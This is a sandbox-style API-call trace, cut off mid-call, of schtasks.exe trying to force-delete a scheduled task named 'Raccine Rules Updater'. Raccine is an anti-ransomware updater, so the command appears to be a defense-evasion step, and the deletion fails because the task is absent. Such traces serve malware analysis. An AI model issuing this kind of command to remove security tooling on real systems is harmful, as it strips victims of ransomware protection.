VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0081.505] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0081.505] VerifyVersionInfoW (in: lpVersionInformation=0xcf61c, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xcf61c) returned 1 [0081.505] SetLastError (dwErrCode=0x0) [0081.505] lstrlenW (lpString="delete") returned 6 [0081.505] StrChrIW (lpStart="delete", wMatch=0x7c) returned 0x0 [0081.505] SetLastError (dwErrCode=0x490) [0081.505] SetLastError (dwErrCode=0x0) [0081.505] lstrlenW (lpString="delete") returned 6 [0081.505] GetProcessHeap () returned 0x1b0000 [0081.505] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5220 [0081.505] GetProcessHeap () returned 0x1b0000 [0081.505] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4a50 [0081.505] _memicmp (_Buf1=0x1c4a50, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.505] GetProcessHeap () returned 0x1b0000 [0081.505] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x16) returned 0x1c5200 [0081.505] SetLastError (dwErrCode=0x0) [0081.505] _memicmp (_Buf1=0x1c4ac8, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.505] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1c5908, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0081.505] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0081.506] GetProcessHeap () returned 0x1b0000 [0081.506] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x74e) returned 0x1c5b18 [0081.506] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x1c5b18 | out: lpData=0x1c5b18) returned 1 [0081.506] VerQueryValueW (in: pBlock=0x1c5b18, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcf724, puLen=0xcf728 | out: lplpBuffer=0xcf724*=0x1c5eb4, puLen=0xcf728) returned 1 [0081.506] _memicmp (_Buf1=0x1c4ac8, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.506] _vsnwprintf (in: _Buffer=0x1c5908, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xcf70c | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0081.506] VerQueryValueW (in: pBlock=0x1c5b18, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xcf734, puLen=0xcf730 | out: lplpBuffer=0xcf734*=0x1c5ce0, puLen=0xcf730) returned 1 [0081.506] lstrlenW (lpString="schtasks.exe") returned 12 [0081.506] lstrlenW (lpString="schtasks.exe") returned 12 [0081.506] lstrlenW (lpString=".EXE") returned 4 [0081.506] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0081.506] lstrlenW (lpString="schtasks.exe") returned 12 [0081.506] lstrlenW (lpString=".EXE") returned 4 [0081.506] lstrlenW (lpString="schtasks") returned 8 [0081.506] lstrlenW (lpString="/delete") returned 7 [0081.506] _memicmp (_Buf1=0x1c4ac8, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.506] _vsnwprintf (in: _Buffer=0x1c5908, _BufferCount=0x19, _Format="%s %s", _ArgList=0xcf70c | out: _Buffer="schtasks /delete") returned 16 [0081.506] _memicmp (_Buf1=0x1c4b28, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.506] GetProcessHeap () returned 0x1b0000 [0081.506] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c51c0 [0081.506] _memicmp (_Buf1=0x1c4b40, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.507] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1c65a0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0081.507] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0081.507] GetProcessHeap () returned 0x1b0000 [0081.507] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x30) returned 0x1c67e0 [0081.507] _vsnwprintf (in: _Buffer=0x1c64f8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xcf710 | out: _Buffer="Type \"SCHTASKS /DELETE /?\" for usage.") returned 37 [0081.507] GetProcessHeap () returned 0x1b0000 [0081.507] GetProcessHeap () returned 0x1b0000 [0081.507] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b18) returned 1 [0081.507] GetProcessHeap () returned 0x1b0000 [0081.507] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5b18) returned 0x74e [0081.507] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b18 | out: hHeap=0x1b0000) returned 1 [0081.507] SetLastError (dwErrCode=0x0) [0081.507] GetThreadLocale () returned 0x409 [0081.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.507] lstrlenW (lpString="delete") returned 6 [0081.507] GetThreadLocale () returned 0x409 [0081.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.507] lstrlenW (lpString="?") returned 1 [0081.507] GetThreadLocale () returned 0x409 [0081.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.507] lstrlenW (lpString="s") returned 1 [0081.507] GetThreadLocale () returned 0x409 [0081.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.507] lstrlenW (lpString="u") returned 1 [0081.507] GetThreadLocale () returned 0x409 [0081.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.507] lstrlenW (lpString="p") returned 1 [0081.507] GetThreadLocale () returned 0x409 [0081.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.507] lstrlenW (lpString="tn") returned 2 [0081.507] GetThreadLocale () returned 0x409 [0081.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.507] lstrlenW (lpString="f") returned 1 [0081.508] SetLastError (dwErrCode=0x0) [0081.508] SetLastError (dwErrCode=0x0) [0081.508] lstrlenW (lpString="/DELETE") returned 7 [0081.508] lstrlenW (lpString="-/") returned 2 [0081.508] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0081.508] lstrlenW (lpString="delete") returned 6 [0081.508] lstrlenW (lpString="delete") returned 6 [0081.508] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.508] lstrlenW (lpString="DELETE") returned 6 [0081.508] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.508] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|delete|") returned 8 [0081.508] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|DELETE|") returned 8 [0081.508] lstrlenW (lpString="|delete|") returned 8 [0081.508] lstrlenW (lpString="|DELETE|") returned 8 [0081.508] StrStrIW (lpFirst="|delete|", lpSrch="|DELETE|") returned="|delete|" [0081.508] SetLastError (dwErrCode=0x0) [0081.508] SetLastError (dwErrCode=0x0) [0081.508] SetLastError (dwErrCode=0x0) [0081.508] lstrlenW (lpString="/TN") returned 3 [0081.508] lstrlenW (lpString="-/") returned 2 [0081.508] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0081.508] lstrlenW (lpString="delete") returned 6 [0081.508] lstrlenW (lpString="delete") returned 6 [0081.508] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.508] lstrlenW (lpString="TN") returned 2 [0081.508] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.508] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|delete|") returned 8 [0081.508] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|TN|") returned 4 [0081.508] lstrlenW (lpString="|delete|") returned 8 [0081.508] lstrlenW (lpString="|TN|") returned 4 [0081.508] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0081.508] SetLastError (dwErrCode=0x490) [0081.508] lstrlenW (lpString="?") returned 1 [0081.509] lstrlenW (lpString="?") returned 1 [0081.509] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.509] lstrlenW (lpString="TN") returned 2 [0081.509] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.509] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|?|") returned 3 [0081.509] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|TN|") returned 4 [0081.509] lstrlenW (lpString="|?|") returned 3 [0081.509] lstrlenW (lpString="|TN|") returned 4 [0081.509] SetLastError (dwErrCode=0x490) [0081.509] lstrlenW (lpString="s") returned 1 [0081.509] lstrlenW (lpString="s") returned 1 [0081.509] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.509] lstrlenW (lpString="TN") returned 2 [0081.509] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.509] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|s|") returned 3 [0081.509] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|TN|") returned 4 [0081.509] lstrlenW (lpString="|s|") returned 3 [0081.509] lstrlenW (lpString="|TN|") returned 4 [0081.509] SetLastError (dwErrCode=0x490) [0081.509] lstrlenW (lpString="u") returned 1 [0081.509] lstrlenW (lpString="u") returned 1 [0081.509] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.509] lstrlenW (lpString="TN") returned 2 [0081.509] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.509] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|u|") returned 3 [0081.509] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|TN|") returned 4 [0081.509] lstrlenW (lpString="|u|") returned 3 [0081.509] lstrlenW (lpString="|TN|") returned 4 [0081.509] SetLastError (dwErrCode=0x490) [0081.509] lstrlenW (lpString="p") returned 1 [0081.509] lstrlenW (lpString="p") returned 1 [0081.509] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.510] lstrlenW (lpString="TN") returned 2 [0081.510] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.510] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|p|") returned 3 [0081.510] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|TN|") returned 4 [0081.510] lstrlenW (lpString="|p|") returned 3 [0081.510] lstrlenW (lpString="|TN|") returned 4 [0081.510] SetLastError (dwErrCode=0x490) [0081.510] lstrlenW (lpString="tn") returned 2 [0081.510] lstrlenW (lpString="tn") returned 2 [0081.510] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.510] lstrlenW (lpString="TN") returned 2 [0081.510] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.510] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|tn|") returned 4 [0081.510] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|TN|") returned 4 [0081.511] lstrlenW (lpString="|tn|") returned 4 [0081.511] lstrlenW (lpString="|TN|") returned 4 [0081.511] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0081.511] SetLastError (dwErrCode=0x0) [0081.511] SetLastError (dwErrCode=0x0) [0081.511] lstrlenW (lpString="Raccine Rules Updater") returned 21 [0081.511] lstrlenW (lpString="-/") returned 2 [0081.511] StrChrIW (lpStart="-/", wMatch=0x52) returned 0x0 [0081.511] SetLastError (dwErrCode=0x490) [0081.511] SetLastError (dwErrCode=0x490) [0081.511] SetLastError (dwErrCode=0x0) [0081.511] lstrlenW (lpString="Raccine Rules Updater") returned 21 [0081.511] StrChrIW (lpStart="Raccine Rules Updater", wMatch=0x3a) returned 0x0 [0081.511] SetLastError (dwErrCode=0x490) [0081.511] SetLastError (dwErrCode=0x0) [0081.511] lstrlenW (lpString="Raccine Rules Updater") returned 21 [0081.511] SetLastError (dwErrCode=0x0) [0081.511] SetLastError (dwErrCode=0x0) [0081.511] lstrlenW (lpString="/F") returned 2 [0081.511] lstrlenW (lpString="-/") returned 2 [0081.511] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0081.511] lstrlenW (lpString="delete") returned 6 [0081.511] lstrlenW (lpString="delete") returned 6 [0081.511] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.511] lstrlenW (lpString="F") returned 1 [0081.511] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.511] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|delete|") returned 8 [0081.511] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|F|") returned 3 [0081.511] lstrlenW (lpString="|delete|") returned 8 [0081.511] lstrlenW (lpString="|F|") returned 3 [0081.511] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0081.511] SetLastError (dwErrCode=0x490) [0081.511] lstrlenW (lpString="?") returned 1 [0081.511] lstrlenW (lpString="?") returned 1 [0081.511] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.512] lstrlenW (lpString="F") returned 1 [0081.512] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.512] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|?|") returned 3 [0081.512] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|F|") returned 3 [0081.512] lstrlenW (lpString="|?|") returned 3 [0081.512] lstrlenW (lpString="|F|") returned 3 [0081.512] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0081.512] SetLastError (dwErrCode=0x490) [0081.512] lstrlenW (lpString="s") returned 1 [0081.512] lstrlenW (lpString="s") returned 1 [0081.512] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.512] lstrlenW (lpString="F") returned 1 [0081.512] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.512] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|s|") returned 3 [0081.512] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|F|") returned 3 [0081.512] lstrlenW (lpString="|s|") returned 3 [0081.512] lstrlenW (lpString="|F|") returned 3 [0081.512] StrStrIW (lpFirst="|s|", lpSrch="|F|") returned 0x0 [0081.512] SetLastError (dwErrCode=0x490) [0081.512] lstrlenW (lpString="u") returned 1 [0081.512] lstrlenW (lpString="u") returned 1 [0081.512] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.512] lstrlenW (lpString="F") returned 1 [0081.512] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.512] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|u|") returned 3 [0081.512] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|F|") returned 3 [0081.512] lstrlenW (lpString="|u|") returned 3 [0081.512] lstrlenW (lpString="|F|") returned 3 [0081.512] StrStrIW (lpFirst="|u|", lpSrch="|F|") returned 0x0 [0081.512] SetLastError (dwErrCode=0x490) [0081.512] lstrlenW (lpString="p") returned 1 [0081.512] lstrlenW (lpString="p") returned 1 [0081.513] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.513] lstrlenW (lpString="F") returned 1 [0081.513] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.513] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|p|") returned 3 [0081.513] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|F|") returned 3 [0081.513] lstrlenW (lpString="|p|") returned 3 [0081.513] lstrlenW (lpString="|F|") returned 3 [0081.513] StrStrIW (lpFirst="|p|", lpSrch="|F|") returned 0x0 [0081.513] SetLastError (dwErrCode=0x490) [0081.513] lstrlenW (lpString="tn") returned 2 [0081.513] lstrlenW (lpString="tn") returned 2 [0081.513] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.513] lstrlenW (lpString="F") returned 1 [0081.513] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.513] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|tn|") returned 4 [0081.513] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|F|") returned 3 [0081.513] lstrlenW (lpString="|tn|") returned 4 [0081.513] lstrlenW (lpString="|F|") returned 3 [0081.513] StrStrIW (lpFirst="|tn|", lpSrch="|F|") returned 0x0 [0081.513] SetLastError (dwErrCode=0x490) [0081.513] lstrlenW (lpString="f") returned 1 [0081.513] lstrlenW (lpString="f") returned 1 [0081.513] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.513] lstrlenW (lpString="F") returned 1 [0081.513] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.513] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|f|") returned 3 [0081.513] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf6f8 | out: _Buffer="|F|") returned 3 [0081.513] lstrlenW (lpString="|f|") returned 3 [0081.513] lstrlenW (lpString="|F|") returned 3 [0081.513] StrStrIW (lpFirst="|f|", lpSrch="|F|") returned="|f|" [0081.513] SetLastError (dwErrCode=0x0) [0081.513] SetLastError (dwErrCode=0x0) [0081.513] lstrlenW (lpString="Raccine Rules Updater") returned 21 [0081.514] SetLastError (dwErrCode=0x0) [0081.514] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0081.514] GetProcAddress (hModule=0x76d10000, lpProcName="OpenSCManagerW") returned 0x76d163ad [0081.514] OpenSCManagerW (lpMachineName="", lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x1c7ad8 [0081.517] GetProcAddress (hModule=0x76d10000, lpProcName="OpenServiceW") returned 0x76d1714b [0081.517] OpenServiceW (hSCManager=0x1c7ad8, lpServiceName="Schedule", dwDesiredAccess=0x14) returned 0x1c7a38 [0081.518] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-winsvc-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0081.518] GetProcAddress (hModule=0x76d10000, lpProcName="QueryServiceStatus") returned 0x76d14e4b [0081.518] QueryServiceStatus (in: hService=0x1c7a38, lpServiceStatus=0xced44 | out: lpServiceStatus=0xced44*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x2c1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0081.518] GetProcAddress (hModule=0x76d10000, lpProcName="CloseServiceHandle") returned 0x76d14dc3 [0081.518] CloseServiceHandle (hSCObject=0x1c7ad8) returned 1 [0081.518] GetProcAddress (hModule=0x76d10000, lpProcName="CloseServiceHandle") returned 0x76d14dc3 [0081.518] CloseServiceHandle (hSCObject=0x1c7a38) returned 1 [0081.576] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0081.694] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0081.844] CoCreateInstance (in: rclsid=0x59230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x5920fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xcf150 | out: ppv=0xcf150*=0x3b3c80) returned 0x0 [0082.077] TaskScheduler:ITaskService:Connect (This=0x3b3c80, serverName=0xcf0c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xcf0d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xcf0e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xcf0f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0082.129] TaskScheduler:IUnknown:AddRef (This=0x3b3c80) returned 0x2 [0082.129] TaskScheduler:ITaskService:GetFolder (in: This=0x3b3c80, Path=0x0, ppFolder=0xcf194 | out: ppFolder=0xcf194*=0x3b3ce8) returned 0x0 [0082.133] GetProcessHeap () returned 0x1b0000 [0082.133] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1d1128 [0082.133] GetThreadLocale () returned 0x409 [0082.133] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Raccine Rules Updater", cchCount1=-1, lpString2="*", cchCount2=-1) returned 3 [0082.133] ITaskFolder:GetTask (in: This=0x3b3ce8, Path="Raccine Rules Updater", ppTask=0xcf13c | out: ppTask=0xcf13c*=0x0) returned 0x80070002 [0082.133] lstrlenW (lpString="Raccine Rules Updater") returned 21 [0082.133] GetProcessHeap () returned 0x1b0000 [0082.133] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x2c) returned 0x1d4600 [0082.134] GetProcessHeap () returned 0x1b0000 [0082.134] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c55e0 [0082.134] ITaskFolder:DeleteTask (This=0x3b3ce8, Name="Raccine Rules Updater", flags=0) returned 0x80070002 [0082.136] SetLastError (dwErrCode=0x80070002) [0082.136] GetLastError () returned 0x80070002 [0082.136] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x80070002, dwLanguageId=0x0, lpBuffer=0xcf158, nSize=0x0, Arguments=0x0 | out: lpBuffer="䘸\x1d\x0c鿹Z\x01") returned 0x2c [0082.136] GetLastError () returned 0x80070002 [0082.136] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44 [0082.136] GetProcessHeap () returned 0x1b0000 [0082.136] GetProcessHeap () returned 0x1b0000 [0082.136] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4e38) returned 1 [0082.136] GetProcessHeap () returned 0x1b0000 [0082.136] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4e38) returned 0x2 [0082.136] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4e38 | out: hHeap=0x1b0000) returned 1 [0082.136] GetProcessHeap () returned 0x1b0000 [0082.136] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x5a) returned 0x1d46a0 [0082.136] SetLastError (dwErrCode=0x80070002) [0082.136] GetProcessHeap () returned 0x1b0000 [0082.136] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5600 [0082.136] _memicmp (_Buf1=0x1c4b40, _Buf2=0x591ed8, _Size=0x7) returned 0 [0082.137] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x1c65a0, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0082.137] lstrlenW (lpString="ERROR:") returned 6 [0082.137] GetProcessHeap () returned 0x1b0000 [0082.137] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xe) returned 0x1d10e0 [0082.137] GetProcessHeap () returned 0x1b0000 [0082.137] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1d1158 [0082.137] _memicmp (_Buf1=0x1d1158, _Buf2=0x591ed8, _Size=0x7) returned 0 [0082.137] GetProcessHeap () returned 0x1b0000 [0082.137] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x1000) returned 0x1d5210 [0082.137] _vsnwprintf (in: _Buffer=0x1d5210, _BufferCount=0x7ff, _Format="%s ", _ArgList=0xcf15c | out: _Buffer="ERROR: ") returned 7 [0082.137] _fileno (_File=0x77032940) returned -2 [0082.137] _errno () returned 0x3b07d8 [0082.137] _get_osfhandle (_FileHandle=-2) returned 0xffffffff [0082.137] SetLastError (dwErrCode=0x6) [0082.137] lstrlenW (lpString="ERROR: ") returned 7 [0082.137] GetConsoleOutputCP () returned 0x1b5 [0082.138] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ERROR: ", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0082.138] GetConsoleOutputCP () returned 0x1b5 [0082.138] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ERROR: ", cchWideChar=7, lpMultiByteStr=0x5ba1e8, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR: ", lpUsedDefaultChar=0x0) returned 7 [0082.138] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 7 [0082.138] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned -1 [0082.138] _fileno (_File=0x77032940) returned -2 [0082.138] _errno () returned 0x3b07d8 [0082.138] _get_osfhandle (_FileHandle=-2) returned 0xffffffff [0082.138] SetLastError (dwErrCode=0x6) [0082.138] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44 [0082.138] GetConsoleOutputCP () returned 0x1b5 [0082.138] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system cannot find the file specified.\r\n", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, 